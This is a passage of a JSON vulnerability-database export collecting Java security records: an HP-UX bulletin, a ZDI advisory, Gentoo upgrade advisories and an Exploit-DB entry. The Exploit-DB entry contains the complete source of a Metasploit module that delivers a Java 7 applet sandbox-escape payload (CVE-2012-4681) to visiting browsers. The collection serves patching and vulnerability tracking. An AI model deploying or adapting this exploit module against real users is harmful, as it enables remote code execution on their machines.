Update\r\nFor Java v6.0 update to Java v6.0.16 or subsequent\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\n\r\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\r\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\r\nissued by HP and lists recommended actions that may apply to a specific HP-UX\r\nsystem. It can also download patches and create a depot automatically. For\r\nmore information see https://www.hp.com/go/swa\r\n\r\nThe following text is for use by the HP-UX Software Assistant.\r\n\r\nAFFECTED VERSIONS\r\n\r\nHP-UX B.11.23\r\nHP-UX B.11.31\r\n===========\r\nJdk60.JDK60-COM\r\nJdk60.JDK60-DEMO\r\nJdk60.JDK60-IPF32\r\nJdk60.JDK60-IPF64\r\nJre60.JRE60-COM\r\nJre60.JRE60-IPF32\r\nJre60.JRE60-IPF32-HS\r\nJre60.JRE60-IPF64\r\nJre60.JRE60-IPF64-HS\r\naction: install revision 1.6.0.16.00 or subsequent\r\n\r\nHP-UX B.11.11\r\nHP-UX B.11.23\r\n===========\r\nJdk60.JDK60-COM\r\nJdk60.JDK60-DEMO\r\nJdk60.JDK60-PA20\r\nJdk60.JDK60-PA20W\r\nJre60.JRE60-COM\r\nJre60.JRE60-COM-DOC\r\nJre60.JRE60-PA20\r\nJre60.JRE60-PA20-HS\r\nJre60.JRE60-PA20W\r\nJre60.JRE60-PA20W-HS\r\naction: install revision 1.6.0.16.00 or subsequent\r\n\r\nEND AFFECTED VERSIONS\r\n\r\nHISTORY\r\nVersion:1 &#40;rev.1&#41; - 23 October 2012 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer&#39;s patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin List: A list of HP Security Bulletins, updated\r\nperiodically, is contained in HP Security Notice HPSN-2011-001:\r\nhttps://h20566.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c02964430\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttp://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2012 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided &quot;as is&quot;\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits;damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAlCHEU0ACgkQ4B86/C0qfVlepwCgsXb7GsZkyVvyv9DAxNMaHoC6\r\nhAMAoM1glL2xJXLx6hPHZdhgIt5cNnCx\r\n=BkkC\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2012-10-30T00:00:00", "published": "2012-10-30T00:00:00", "id": "SECURITYVULNS:DOC:28720", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28720", "title": "[security bulletin] HPSBUX02825 SSRT100974 rev.1 - HP-UX Running Java, Remote Indirect Vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:49", "bulletinFamily": "software", "cvelist": ["CVE-2012-5089", "CVE-2012-5074", "CVE-2012-5073", "CVE-2012-1533", "CVE-2012-3159", "CVE-2012-5087", "CVE-2012-5085", "CVE-2012-5076", "CVE-2012-5079", "CVE-2012-4416", "CVE-2012-5075", "CVE-2012-5081", "CVE-2012-5067", "CVE-2012-5083", "CVE-2012-5088", "CVE-2012-5086", "CVE-2012-1532", "CVE-2012-5077", "CVE-2012-5069", "CVE-2012-3216", "CVE-2012-5084", "CVE-2012-5071", "CVE-2012-5078", "CVE-2012-0547", "CVE-2012-5072", "CVE-2012-1531", "CVE-2012-5068", "CVE-2012-3143", "CVE-2012-5080", "CVE-2012-5082", "CVE-2012-5070"], "description": "30 of different vulnerabilities", "edition": 1, "modified": "2012-10-30T00:00:00", "published": "2012-10-30T00:00:00", "id": "SECURITYVULNS:VULN:12665", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12665", "title": "Oracle Java / OpenJDK multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdi": [{"lastseen": "2020-06-22T11:42:25", "bulletinFamily": "info", "cvelist": ["CVE-2012-4681", "CVE-2012-1682"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle Java. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the java.beans.Expression class. Due to unsafe handling of reflection of privileged classes inside the Expression class it is possible for untrusted code to gain access to privileged methods and properties. This can result in remote code execution under the context of the current process.", "modified": "2012-06-22T00:00:00", "published": "2012-12-21T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-197/", "id": "ZDI-12-197", "title": "Oracle Java java.beans.Statement Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T17:58:07", "description": "BUGTRAQ ID: 55339\r\nCVE ID: CVE-2012-0547\r\n\r\nSun Java Runtime Environment\u662f\u4e00\u6b3e\u4e3aJAVA\u5e94\u7528\u7a0b\u5e8f\u63d0\u4f9b\u53ef\u9760\u7684\u8fd0\u884c\u73af\u5883\u7684\u89e3\u51b3\u65b9\u6848\u3002\r\n\r\nOracle Java SE 7 Update 6\u53ca\u4e4b\u524d\u7248\u672c\u30016 Update 34\u53ca\u4e4b\u524d\u7248\u672c\u7684JRE\u7ec4\u4ef6\u4e2d\u5b58\u5728\u4e0d\u660e\u7ec6\u8282\u6f0f\u6d1e\uff0c\u5f71\u54cd\u76ee\u524d\u672a\u77e5\u3002\n0\nSun JRE 1.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nOracle\r\n------\r\nOracle\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08alert-cve-2012-4681-1835715\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\n\r\nalert-cve-2012-4681-1835715\uff1aOracle Security Alert for CVE-2012-4681\r\n\r\n\u94fe\u63a5\uff1ahttp://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html", "published": "2012-09-04T00:00:00", "title": "Oracle Sun JRE 1.x \u8fdc\u7a0bJRE\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0547", "CVE-2012-4681"], "modified": "2012-09-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60367", "id": "SSV:60367", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "exploitdb": [{"lastseen": "2016-02-02T15:10:17", "description": "Java 7 Applet Remote Code Execution. CVE-2012-0547,CVE-2012-3539,CVE-2012-4681. Remote exploit for java platform", "published": "2012-08-27T00:00:00", "type": "exploitdb", "title": "Java 7 Applet Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-3539", "CVE-2012-0547", "CVE-2012-4681"], "modified": "2012-08-27T00:00:00", "id": "EDB-ID:20865", "href": "https://www.exploit-db.com/exploits/20865/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tinclude Msf::Exploit::Remote::BrowserAutopwn\r\n\tautopwn_info({ :javascript => false })\r\n\r\n\tdef initialize( info = {} )\r\n\t\tsuper( update_info( info,\r\n\t\t\t'Name' => 'Java 7 Applet Remote Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary\r\n\t\t\t\tJava code outside the sandbox. This flaw is also being exploited in the wild, and there is\r\n\t\t\t\tno patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome\r\n\t\t\t\tand\tFirefox across different platforms.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Unknown', # Vulnerability Discovery\r\n\t\t\t\t\t'jduck', # metasploit module\r\n\t\t\t\t\t'sinn3r', # metasploit module\r\n\t\t\t\t\t'juan vazquez', # metasploit module\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t#[ 'CVE', '' ],\r\n\t\t\t\t\t#[ 'OSVDB', '' ],\r\n\t\t\t\t\t[ 'URL', 'http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html' ]\r\n\t\t\t\t],\r\n\t\t\t'Platform' => [ 'java', 'win', 'linux' ],\r\n\t\t\t'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Generic (Java Payload)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_JAVA,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Windows Universal',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'win'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'linux'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Aug 26 2012'\r\n\t\t\t))\r\n\tend\r\n\r\n\r\n\tdef on_request_uri( cli, request )\r\n\t\tif not request.uri.match(/\\.jar$/i)\r\n\t\t\tif not request.uri.match(/\\/$/)\r\n\t\t\t\tsend_redirect(cli, get_resource() + '/', '')\r\n\t\t\t\treturn\r\n\t\t\tend\r\n\r\n\t\t\tprint_status(\"#{self.name} handling request\")\r\n\r\n\t\t\tsend_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tpaths = [\r\n\t\t\t[ \"Exploit.class\" ]\r\n\t\t]\r\n\r\n\t\tp = regenerate_payload(cli)\r\n\r\n\t\tjar = p.encoded_jar\r\n\t\tpaths.each do |path|\r\n\t\t\t1.upto(path.length - 1) do |idx|\r\n\t\t\t\tfull = path[0,idx].join(\"/\") + \"/\"\r\n\t\t\t\tif !(jar.entries.map{|e|e.name}.include?(full))\r\n\t\t\t\t\tjar.add_file(full, '')\r\n\t\t\t\tend\r\n\t\t\tend\r\n\t\t\tfd = File.open(File.join( Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2012-XXXX\", path ), \"rb\")\r\n\t\t\tdata = fd.read(fd.stat.size)\r\n\t\t\tjar.add_file(path.join(\"/\"), data)\r\n\t\t\tfd.close\r\n\t\tend\r\n\r\n\t\tprint_status(\"Sending Applet.jar\")\r\n\t\tsend_response( cli, jar.pack, { 'Content-Type' => \"application/octet-stream\" } )\r\n\r\n\t\thandler( cli )\r\n\tend\r\n\r\n\tdef generate_html\r\n\t\thtml = \"<html><head></head>\"\r\n\t\thtml += \"<body>\"\r\n\t\thtml += \"<applet archive=\\\"Exploit.jar\\\" code=\\\"Exploit.class\\\" width=\\\"1\\\" height=\\\"1\\\">\"\r\n\t\thtml += \"</applet></body></html>\"\r\n\t\treturn html\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/20865/"}], "gentoo": [{"lastseen": "2016-09-06T19:46:14", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2418", "CVE-2012-5089", "CVE-2013-2431", "CVE-2013-2468", "CVE-2013-2420", "CVE-2013-5889", "CVE-2013-2384", "CVE-2013-2415", "CVE-2013-5848", "CVE-2012-1711", "CVE-2013-1491", "CVE-2013-1571", "CVE-2013-5782", "CVE-2013-5846", "CVE-2012-1541", "CVE-2013-2417", "CVE-2013-0402", "CVE-2013-5818", "CVE-2013-2433", "CVE-2013-1500", "CVE-2013-2448", "CVE-2013-2416", "CVE-2013-2427", "CVE-2013-0401", "CVE-2012-5074", "CVE-2012-5073", "CVE-2012-1725", "CVE-2014-0385", "CVE-2013-2424", "CVE-2013-5878", "CVE-2013-5850", "CVE-2013-2407", "CVE-2012-1533", "CVE-2013-5778", "CVE-2013-2456", "CVE-2013-0448", "CVE-2014-0410", "CVE-2013-2436", "CVE-2013-2454", "CVE-2013-2470", "CVE-2013-1485", "CVE-2013-1479", "CVE-2013-2462", "CVE-2013-0169", "CVE-2014-0415", "CVE-2013-2414", "CVE-2012-1719", "CVE-2013-2394", "CVE-2011-3563", "CVE-2013-5870", "CVE-2013-2421", "CVE-2012-3159", "CVE-2013-1518", "CVE-2013-5776", "CVE-2012-5087", "CVE-2013-5788", "CVE-2013-5905", "CVE-2013-0809", "CVE-2013-5904", "CVE-2013-5888", "CVE-2013-2452", "CVE-2012-3342", "CVE-2013-2451", "CVE-2013-5893", "CVE-2013-5842", "CVE-2014-0387", "CVE-2012-5085", "CVE-2012-5076", "CVE-2013-5810", "CVE-2013-5830", "CVE-2013-2473", "CVE-2012-5079", "CVE-2012-4416", "CVE-2013-5898", "CVE-2012-0507", "CVE-2012-5075", "CVE-2013-1473", "CVE-2013-5832", "CVE-2012-3136", "CVE-2013-1488", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2014-0375", "CVE-2012-5081", "CVE-2012-5067", "CVE-2013-5817", "CVE-2012-0503", "CVE-2012-3174", "CVE-2011-5035", "CVE-2013-2419", "CVE-2012-1723", "CVE-2013-2463", "CVE-2013-1563", "CVE-2013-2469", "CVE-2013-5787", "CVE-2013-5852", "CVE-2012-1726", "CVE-2014-0418", "CVE-2013-0351", "CVE-2013-2465", "CVE-2014-0373", "CVE-2013-1537", "CVE-2013-3743", "CVE-2013-5854", "CVE-2012-0498", "CVE-2013-5806", "CVE-2013-5805", "CVE-2013-5887", "CVE-2012-0506", "CVE-2014-0408", "CVE-2013-5825", "CVE-2012-1717", "CVE-2012-1721", "CVE-2014-0376", "CVE-2013-2423", "CVE-2014-0422", "CVE-2013-5789", "CVE-2014-0411", "CVE-2013-2439", "CVE-2013-1561", "CVE-2013-5823", "CVE-2013-0409", "CVE-2013-5895", "CVE-2013-0438", "CVE-2012-1713", "CVE-2013-2461", "CVE-2012-1716", "CVE-2013-2428", "CVE-2012-5083", "CVE-2013-5843", "CVE-2012-5088", "CVE-2013-5899", "CVE-2013-2429", "CVE-2013-5812", "CVE-2013-5849", "CVE-2012-5086", "CVE-2013-5896", "CVE-2013-2471", "CVE-2012-0497", "CVE-2012-1532", "CVE-2012-5077", "CVE-2013-1486", "CVE-2014-0417", "CVE-2013-5780", "CVE-2013-5910", "CVE-2013-1487", "CVE-2013-5906", "CVE-2013-0430", "CVE-2013-0445", "CVE-2012-5069", "CVE-2014-0428", "CVE-2012-3216", "CVE-2014-0382", "CVE-2012-0505", "CVE-2013-5824", "CVE-2012-5084", "CVE-2013-5831", "CVE-2012-1718", "CVE-2013-2440", "CVE-2013-2434", "CVE-2013-2464", "CVE-2013-2458", "CVE-2012-3213", "CVE-2013-2459", "CVE-2012-5071", "CVE-2013-5814", "CVE-2013-2442", "CVE-2012-0499", "CVE-2012-0501", "CVE-2013-0446", "CVE-2013-2432", "CVE-2012-1722", "CVE-2014-0368", "CVE-2013-2443", "CVE-2014-0423", "CVE-2013-1481", "CVE-2013-5775", "CVE-2013-2446", "CVE-2012-0547", "CVE-2013-5829", "CVE-2013-5803", "CVE-2012-5072", "CVE-2013-2450", "CVE-2013-2400", "CVE-2013-2472", "CVE-2013-2438", "CVE-2013-1540", "CVE-2012-0500", "CVE-2013-2467", "CVE-2013-5907", "CVE-2013-1493", "CVE-2013-5902", "CVE-2012-1531", "CVE-2013-2444", "CVE-2013-3744", "CVE-2013-2447", "CVE-2013-2457", "CVE-2013-5844", "CVE-2013-0437", "CVE-2012-4681", "CVE-2013-2437", "CVE-2013-2453", "CVE-2013-1557", "CVE-2012-0504", "CVE-2013-2426", "CVE-2014-0424", "CVE-2013-2455", "CVE-2013-5819", "CVE-2013-2422", "CVE-2013-2435", "CVE-2013-2383", "CVE-2013-1484", "CVE-2013-1564", "CVE-2013-1558", "CVE-2013-5774", "CVE-2012-1724", "CVE-2013-0422", "CVE-2012-5068", "CVE-2014-0403", "CVE-2013-3829", "CVE-2012-1682", "CVE-2012-3143", "CVE-2012-0502", "CVE-2013-5783", "CVE-2013-5800", "CVE-2013-5820", "CVE-2013-2425", "CVE-2013-5777", "CVE-2013-5790", "CVE-2013-1569", "CVE-2013-5838", "CVE-2013-2412", "CVE-2013-0449", "CVE-2013-2445", "CVE-2013-2430", "CVE-2013-2460", "CVE-2013-5840", "CVE-2013-5801", "CVE-2014-0416", "CVE-2013-2449", "CVE-2013-2466", "CVE-2012-5070", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-0423", "CVE-2013-5772", "CVE-2013-0419"], "description": "### Background\n\nThe Oracle Java Development Kit (JDK) (formerly known as Sun JDK) and the Oracle Java Runtime Environment (JRE) (formerly known as Sun JRE) provide the Oracle Java platform (formerly known as Sun Java Platform). \n\n### Description\n\nMultiple vulnerabilities have been reported in the Oracle Java implementation. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nAn unauthenticated, remote attacker could exploit these vulnerabilities to execute arbitrary code. Furthermore, a local or remote attacker could exploit these vulnerabilities to cause unspecified impact, possibly including remote execution of arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Oracle JDK 1.7 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-java/oracle-jdk-bin-1.7.0.51\"\n \n\nAll Oracle JRE 1.7 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-java/oracle-jre-bin-1.7.0.51\"\n \n\nAll users of the precompiled 32-bit Oracle JRE should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=app-emulation/emul-linux-x86-java-1.7.0.51\"\n \n\nAll Sun Microsystems JDK/JRE 1.6 users are suggested to upgrade to one of the newer Oracle packages like dev-java/oracle-jdk-bin or dev-java/oracle-jre-bin or choose another alternative we provide; eg. the IBM JDK/JRE or the open source IcedTea. \n\nNOTE: As Oracle has revoked the DLJ license for its Java implementation, the packages can no longer be updated automatically.", "edition": 1, "modified": "2014-01-27T00:00:00", "published": "2014-01-27T00:00:00", "id": "GLSA-201401-30", "href": "https://security.gentoo.org/glsa/201401-30", "type": "gentoo", "title": "Oracle JRE/JDK: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-06T19:46:20", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5089", "CVE-2013-0426", "CVE-2013-2431", "CVE-2010-3562", "CVE-2013-2420", "CVE-2011-0865", "CVE-2013-2384", "CVE-2013-2415", "CVE-2012-1711", "CVE-2014-2397", "CVE-2013-1571", "CVE-2013-5782", "CVE-2011-3557", "CVE-2013-2417", "CVE-2013-1500", "CVE-2013-2448", "CVE-2010-3557", "CVE-2011-3551", "CVE-2013-4002", "CVE-2013-0401", "CVE-2012-5074", "CVE-2012-5073", "CVE-2013-0427", "CVE-2012-1725", "CVE-2013-2424", "CVE-2014-0457", "CVE-2013-5850", "CVE-2013-2407", "CVE-2013-5778", "CVE-2013-1478", "CVE-2013-2456", "CVE-2010-3551", "CVE-2011-0868", "CVE-2013-0428", "CVE-2014-0446", "CVE-2013-2436", "CVE-2013-2454", "CVE-2013-2470", "CVE-2013-1485", "CVE-2013-0169", "CVE-2010-3553", "CVE-2012-1719", "CVE-2014-1876", "CVE-2014-0458", "CVE-2013-0429", "CVE-2014-2427", "CVE-2011-3563", "CVE-2013-1475", "CVE-2013-2421", "CVE-2013-1518", "CVE-2013-0435", "CVE-2012-5087", "CVE-2013-0809", "CVE-2013-0442", "CVE-2010-3566", "CVE-2013-2452", "CVE-2013-2451", "CVE-2013-5842", "CVE-2010-4448", "CVE-2013-0431", "CVE-2010-4465", "CVE-2012-5085", "CVE-2012-4540", "CVE-2011-0869", "CVE-2010-3565", "CVE-2012-5076", "CVE-2013-5830", "CVE-2013-2473", "CVE-2013-6954", "CVE-2012-4416", "CVE-2012-5075", "CVE-2014-0453", "CVE-2013-1488", "CVE-2012-0424", "CVE-2013-0434", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2011-3548", "CVE-2012-5081", "CVE-2011-3547", "CVE-2013-5817", "CVE-2010-4469", "CVE-2012-0503", "CVE-2011-3521", "CVE-2013-0443", "CVE-2011-5035", "CVE-2013-2419", "CVE-2014-0461", "CVE-2012-1723", "CVE-2013-2463", "CVE-2011-3571", "CVE-2010-3860", "CVE-2011-3389", "CVE-2013-2469", "CVE-2014-0459", "CVE-2014-0456", "CVE-2010-4450", "CVE-2012-1726", "CVE-2013-2465", "CVE-2013-1537", "CVE-2014-0429", "CVE-2013-5806", "CVE-2010-3574", "CVE-2011-3544", "CVE-2013-5805", "CVE-2011-3553", "CVE-2013-0444", "CVE-2012-0506", "CVE-2013-0433", "CVE-2013-1480", "CVE-2013-5825", "CVE-2012-1717", "CVE-2013-2423", "CVE-2010-3541", "CVE-2013-5823", "CVE-2011-3558", "CVE-2014-2403", "CVE-2012-1713", "CVE-2013-2461", "CVE-2012-1716", "CVE-2009-3555", "CVE-2013-2429", "CVE-2013-5849", "CVE-2014-2412", "CVE-2010-2548", "CVE-2012-5086", "CVE-2013-2471", "CVE-2012-0497", "CVE-2012-5077", "CVE-2013-1486", "CVE-2013-1476", "CVE-2010-4476", "CVE-2010-4472", "CVE-2013-5780", "CVE-2010-4471", "CVE-2014-2421", "CVE-2012-5069", "CVE-2012-3216", "CVE-2014-0460", "CVE-2011-0870", "CVE-2011-0815", "CVE-2013-0432", "CVE-2012-0505", "CVE-2012-5084", "CVE-2012-1718", "CVE-2010-2783", "CVE-2013-2458", "CVE-2011-3554", "CVE-2013-0424", "CVE-2013-2459", "CVE-2013-0450", "CVE-2012-5071", "CVE-2013-5814", "CVE-2010-3561", "CVE-2011-0025", "CVE-2012-0501", "CVE-2010-3564", "CVE-2013-0440", "CVE-2013-2443", "CVE-2010-3549", "CVE-2012-3422", "CVE-2013-2446", "CVE-2011-3556", "CVE-2012-0547", "CVE-2013-5829", "CVE-2010-3554", "CVE-2013-5803", "CVE-2012-5072", "CVE-2013-2450", "CVE-2013-2472", "CVE-2014-2423", "CVE-2010-4470", "CVE-2011-0822", "CVE-2011-3560", "CVE-2013-1493", "CVE-2013-2444", "CVE-2013-2447", "CVE-2013-2457", "CVE-2010-4351", "CVE-2011-0864", "CVE-2013-2453", "CVE-2013-1557", "CVE-2013-2426", "CVE-2013-2455", "CVE-2013-2422", "CVE-2013-2383", "CVE-2013-0425", "CVE-2013-1484", "CVE-2011-3552", "CVE-2013-5774", "CVE-2012-1724", "CVE-2010-3567", "CVE-2010-3573", "CVE-2013-6629", "CVE-2012-5068", "CVE-2013-3829", "CVE-2013-0441", "CVE-2010-3548", "CVE-2011-0706", "CVE-2012-5979", "CVE-2012-0502", "CVE-2013-5783", "CVE-2010-4467", "CVE-2012-3423", "CVE-2013-5800", "CVE-2013-5820", "CVE-2013-5790", "CVE-2014-2398", "CVE-2010-3568", "CVE-2014-0451", "CVE-2013-1569", "CVE-2013-2412", "CVE-2014-0452", "CVE-2011-0862", "CVE-2013-2445", "CVE-2013-2430", "CVE-2013-2460", "CVE-2013-5840", "CVE-2014-2414", "CVE-2010-3569", "CVE-2011-0871", "CVE-2013-2449", "CVE-2011-0872", "CVE-2012-5070", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "description": "### Background\n\nIcedTea is a distribution of the Java OpenJDK source code built with free build tools. \n\n### Description\n\nMultiple vulnerabilities have been discovered in the IcedTea JDK. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, bypass intended security policies, or have other unspecified impact. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll IcedTea JDK users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-java/icedtea-bin-6.1.13.3\"", "edition": 1, "modified": "2016-04-19T00:00:00", "published": "2014-06-29T00:00:00", "id": "GLSA-201406-32", "href": "https://security.gentoo.org/glsa/201406-32", "type": "gentoo", "title": "IcedTea JDK: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}